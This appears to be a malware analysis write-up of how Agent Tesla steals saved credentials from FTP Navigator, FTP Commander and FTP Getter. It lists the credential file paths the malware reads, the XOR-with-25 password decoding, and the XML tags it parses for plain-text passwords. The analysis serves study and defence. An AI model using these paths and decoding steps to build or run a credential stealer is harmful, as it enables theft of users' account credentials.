Agent tesla starts looking for {@"C:\FTP Navigator\Ftplist.txt"} because ftp navigator saves all its
credentials in this path.

It splits the string which ends with ";" and saves all parts in array like shown in figure.

It appears that the decryption method involves a simple XOR operation with the character
'\u0019', which is equivalent to the decimal value 25. This operation is applied to each
character in the encrypted password string to obtain the plaintext password.

Here's a summary of the decryption process:

 1. Take the encrypted password.
2. For each character in the encrypted password, perform a bitwise XOR operation with
the character '\u0019' (decimal 25).
3. Repeat this operation for every character in the encrypted password string.
4. The result of these XOR operations is the decrypted plaintext password.

FTP Commander
FTP Commander is a Windows-based FTP (File Transfer Protocol) client software used for transferring
files between a local computer and a remote server over the internet. It provides a user-friendly
interface for managing FTP connections and transferring files. FTP is commonly used for uploading files
to a web server, downloading files from a remote server, or managing files on a remote server.

The exploit starts by looking at these following paths, it saves 5 paths in array for credentials harvesting.

• @"C:\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt"

• @"C:\Program Files (x86)\FTP Commander\Ftplist.txt"
• @"C:\cftp\Ftplist.txt"
• @"C:\Users\%username%\AppData\Local\VirtualStore\Program Files (x86)\FTP
Commander\Ftplist.txt"
 • @"C:\Users\%username%\AppData\Local\VirtualStore\Program Files (x86)\FTP
Commander Deluxe\Ftplist.txt"

It starts reading from @"C:\Program Files (x86) \FTP Commander\Ftplist.txt" and looping through all the
credentials.

The password was encrypted, only other details were visible and plain text.
The main objective of this method is to decrypt the characters in the input string (likely "N9cu") by using
an XOR operation with the integer "25," resulting in the decryption of the password into its original,
unencrypted form.
FTP Getter
"FTP Getter" appears to be a generic term that could refer to any FTP client software or utility used to
interact with FTP servers for file transfers. There are various FTP client applications available, both free
and paid, that allow users to connect to FTP servers, upload and download files, and manage their FTP
connections.

The exploit starts by looking at path "AppData\Roaming\FTPGetter\servers.xml"

So, I updated the path of ftp getter because I was testing on portable to see how it extract the creds,
usually it uses roaming\ftpgetter.

It follows these steps.

1. Reading XML Data: The code reads XML data stored as an array of strings.
2. Looping Through Lines: It then iterates through each line of the XML data.
3. Extracting Server IP: Within each line, it checks for the presence of the "<server_ip>" tag. If
found, it extracts the value enclosed between "<server_ip>" and "</server_ip>", which typically
represents the server's IP address.
4. Retrieving Server Username: Similarly, the code searches for the "<server_user_name>" tag and
extracts the value between "<server_user_name>" and "</server_user_name>", which contains
the server's username.
5. Extracting Password: Finally, it looks for the "<server_user_password>" tag and extracts the
value between "<server_user_password>" and "</server_user_password>", which contains the
server's password.
It seems that FTP Getter stores passwords in plain text within its XML configuration files. In this case, an
attacker can simply extract the passwords from these XML files and save them in a list for potential
malicious use, such as unauthorized access to FTP accounts. Storing passwords in plain text is a
significant security risk, as it makes it easier for attackers to steal sensitive credentials.